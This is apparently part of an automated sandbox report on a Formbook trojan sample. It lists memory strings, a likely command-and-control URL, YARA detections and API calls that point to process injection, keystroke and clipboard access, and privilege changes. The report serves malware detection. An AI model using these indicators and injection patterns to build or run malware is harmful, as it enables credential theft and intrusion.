a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 05 Nov 2024 14:24:50 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 
20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
            Source: fZXsbVktlmkz.exe, 00000007.00000002.3554169610.0000000004A7C000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.polarmuseum.info
            Source: fZXsbVktlmkz.exe, 00000007.00000002.3554169610.0000000004A7C000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.polarmuseum.info/9u26/
            Source: write.exe, 00000006.00000002.3555877402.000000000759E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: write.exe, 00000006.00000002.3555877402.000000000759E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: write.exe, 00000006.00000002.3553914086.0000000005188000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002CE8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
            Source: write.exe, 00000006.00000002.3553914086.0000000005188000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002CE8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap-icons
            Source: write.exe, 00000006.00000002.3553914086.0000000005188000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002CE8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css
            Source: write.exe, 00000006.00000002.3555877402.000000000759E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: write.exe, 00000006.00000002.3555877402.000000000759E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: write.exe, 00000006.00000002.3553914086.0000000005188000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002CE8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://code.jquery.com/jquery-3.4.1.min.js
            Source: write.exe, 00000006.00000002.3553914086.000000000531A000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002E7A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb
            Source: write.exe, 00000006.00000002.3555877402.000000000759E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: write.exe, 00000006.00000002.3555877402.000000000759E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: write.exe, 00000006.00000002.3555877402.000000000759E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: write.exe, 00000006.00000002.3553914086.0000000005188000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002CE8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com
            Source: write.exe, 00000006.00000002.3553914086.0000000005188000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002CE8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com/css2?family=Heebo:wght
            Source: write.exe, 00000006.00000002.3553914086.0000000005188000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002CE8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://fonts.gstatic.com
            Source: write.exe, 00000006.00000002.3553914086.0000000005188000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002CE8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://htmlcodex.com
            Source: write.exe, 00000006.00000002.3553914086.0000000005188000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002CE8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://htmlcodex.com/credit-removal
            Source: write.exe, 00000006.00000002.3551184016.0000000002882000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: write.exe, 00000006.00000003.2272928050.0000000002893000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.3551184016.0000000002882000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: write.exe, 00000006.00000003.2272928050.0000000002893000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
            Source: write.exe, 00000006.00000003.2272928050.0000000002893000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.3551184016.0000000002882000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: write.exe, 00000006.00000003.2272928050.0000000002893000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.3551184016.0000000002882000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: write.exe, 00000006.00000002.3551184016.0000000002882000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srfLMEM
            Source: write.exe, 00000006.00000003.2272928050.0000000002893000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.3551184016.0000000002882000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033c
            Source: write.exe, 00000006.00000003.2272928050.0000000002893000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: write.exe, 00000006.00000003.2272928050.0000000002893000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.3551184016.0000000002882000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: write.exe, 00000006.00000003.2272108522.0000000007574000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: write.exe, 00000006.00000002.3555877402.000000000759E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: write.exe, 00000006.00000002.3553914086.000000000531A000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002E7A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.zoho.com/sites/?src=parkeddomain&dr=www.lanxuanz.tech
            Source: write.exe, 00000006.00000002.3553914086.000000000531A000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002E7A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.zoho.com/sites/images/professionally-crafted-themes.png
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00459FFF
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_00456354 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,0_2_00456354
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C08E

            E-Banking Fraud

            Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000006.00000002.3550976082.0000000002690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.3554169610.0000000004A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2094255182.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3551036891.00000000026E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2094963366.0000000005900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3552180620.00000000025B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2093329149.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3550782278.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3550976082.0000000002690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3554169610.0000000004A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2094255182.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3551036891.00000000026E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2094963366.0000000005900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3552180620.00000000025B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2093329149.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3550782278.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0042C403 NtClose, | 1_2_0042C403
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272B60 NtClose,LdrInitializeThunk, | 1_2_03272B60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272DF0 NtQuerySystemInformation,LdrInitializeThunk, | 1_2_03272DF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272C70 NtFreeVirtualMemory,LdrInitializeThunk, | 1_2_03272C70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032735C0 NtCreateMutant,LdrInitializeThunk, | 1_2_032735C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03274340 NtSetContextThread, | 1_2_03274340
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03274650 NtSuspendThread, | 1_2_03274650
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272BA0 NtEnumerateValueKey, | 1_2_03272BA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272B80 NtQueryInformationFile, | 1_2_03272B80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272BE0 NtQueryValueKey, | 1_2_03272BE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272BF0 NtAllocateVirtualMemory, | 1_2_03272BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272AB0 NtWaitForSingleObject, | 1_2_03272AB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272AF0 NtWriteFile, | 1_2_03272AF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272AD0 NtReadFile, | 1_2_03272AD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272F30 NtCreateSection, | 1_2_03272F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272F60 NtCreateProcessEx, | 1_2_03272F60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272FA0 NtQuerySection, | 1_2_03272FA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272FB0 NtResumeThread, | 1_2_03272FB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272F90 NtProtectVirtualMemory, | 1_2_03272F90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272FE0 NtCreateFile, | 1_2_03272FE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272E30 NtWriteVirtualMemory, | 1_2_03272E30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272EA0 NtAdjustPrivilegesToken, | 1_2_03272EA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272E80 NtReadVirtualMemory, | 1_2_03272E80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272EE0 NtQueueApcThread, | 1_2_03272EE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272D30 NtUnmapViewOfSection, | 1_2_03272D30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272D00 NtSetInformationFile, | 1_2_03272D00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272D10 NtMapViewOfSection, | 1_2_03272D10
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272DB0 NtEnumerateKey, | 1_2_03272DB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272DD0 NtDelayExecution, | 1_2_03272DD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272C00 NtQueryInformationProcess, | 1_2_03272C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272C60 NtCreateKey, | 1_2_03272C60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272CA0 NtQueryInformationToken, | 1_2_03272CA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272CF0 NtOpenProcess, | 1_2_03272CF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272CC0 NtQueryVirtualMemory, | 1_2_03272CC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03273010 NtOpenDirectoryObject, | 1_2_03273010
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03273090 NtSetValueKey, | 1_2_03273090
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032739B0 NtGetContextThread, | 1_2_032739B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03273D10 NtOpenProcessToken, | 1_2_03273D10
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03273D70 NtOpenThread, | 1_2_03273D70
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C4650 NtSuspendThread,LdrInitializeThunk, | 6_2_044C4650
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C4340 NtSetContextThread,LdrInitializeThunk, | 6_2_044C4340
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C2C60 NtCreateKey,LdrInitializeThunk, | 6_2_044C2C60
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C2C70 NtFreeVirtualMemory,LdrInitializeThunk, | 6_2_044C2C70
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C2CA0 NtQueryInformationToken,LdrInitializeThunk, | 6_2_044C2CA0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C2D10 NtMapViewOfSection,LdrInitializeThunk, | 6_2_044C2D10
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C2D30 NtUnmapViewOfSection,LdrInitializeThunk, | 6_2_044C2D30
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C2DD0 NtDelayExecution,LdrInitializeThunk, | 6_2_044C2DD0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C2DF0 NtQuerySystemInformation,LdrInitializeThunk, | 6_2_044C2DF0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C2EE0 NtQueueApcThread,LdrInitializeThunk, | 6_2_044C2EE0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C2E80 NtReadVirtualMemory,LdrInitializeThunk, | 6_2_044C2E80
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C2F30 NtCreateSection,LdrInitializeThunk, | 6_2_044C2F30
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C2FE0 NtCreateFile,LdrInitializeThunk, | 6_2_044C2FE0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C2FB0 NtResumeThread,LdrInitializeThunk, | 6_2_044C2FB0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C2AD0 NtReadFile,LdrInitializeThunk, | 6_2_044C2AD0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C2AF0 NtWriteFile,LdrInitializeThunk, | 6_2_044C2AF0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C2B60 NtClose,LdrInitializeThunk, | 6_2_044C2B60
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C2BE0 NtQueryValueKey,LdrInitializeThunk, | 6_2_044C2BE0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk, | 6_2_044C2BF0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C2BA0 NtEnumerateValueKey,LdrInitializeThunk, | 6_2_044C2BA0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C35C0 NtCreateMutant,LdrInitializeThunk, | 6_2_044C35C0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C39B0 NtGetContextThread,LdrInitializeThunk, | 6_2_044C39B0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C2C00 NtQueryInformationProcess, | 6_2_044C2C00
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C2CC0 NtQueryVirtualMemory, | 6_2_044C2CC0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C2CF0 NtOpenProcess, | 6_2_044C2CF0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C2D00 NtSetInformationFile, | 6_2_044C2D00
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C2DB0 NtEnumerateKey, | 6_2_044C2DB0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C2E30 NtWriteVirtualMemory, | 6_2_044C2E30
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C2EA0 NtAdjustPrivilegesToken, | 6_2_044C2EA0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C2F60 NtCreateProcessEx, | 6_2_044C2F60
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C2F90 NtProtectVirtualMemory, | 6_2_044C2F90
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C2FA0 NtQuerySection, | 6_2_044C2FA0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C2AB0 NtWaitForSingleObject, | 6_2_044C2AB0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C2B80 NtQueryInformationFile, | 6_2_044C2B80
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C3010 NtOpenDirectoryObject, | 6_2_044C3010
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C3090 NtSetValueKey, | 6_2_044C3090
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C3D70 NtOpenThread, | 6_2_044C3D70
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_044C3D10 NtOpenProcessToken, | 6_2_044C3D10
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_001F8EC0 NtCreateFile, | 6_2_001F8EC0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_001F9030 NtReadFile, | 6_2_001F9030
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_001F9120 NtDeleteFile, | 6_2_001F9120
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_001F91C0 NtClose, | 6_2_001F91C0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_001F9330 NtAllocateVirtualMemory, | 6_2_001F9330
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_00434D50: GetFullPathNameW,__swprintf,_wcslen,_wcslen,_wcslen,CreateDirectoryW,CreateFileW,_memset,_wcslen,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle, | 0_2_00434D50
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_004461ED _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, | 0_2_004461ED
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, | 0_2_004364AA
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_00409A40 | 0_2_00409A40
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_00412038 | 0_2_00412038
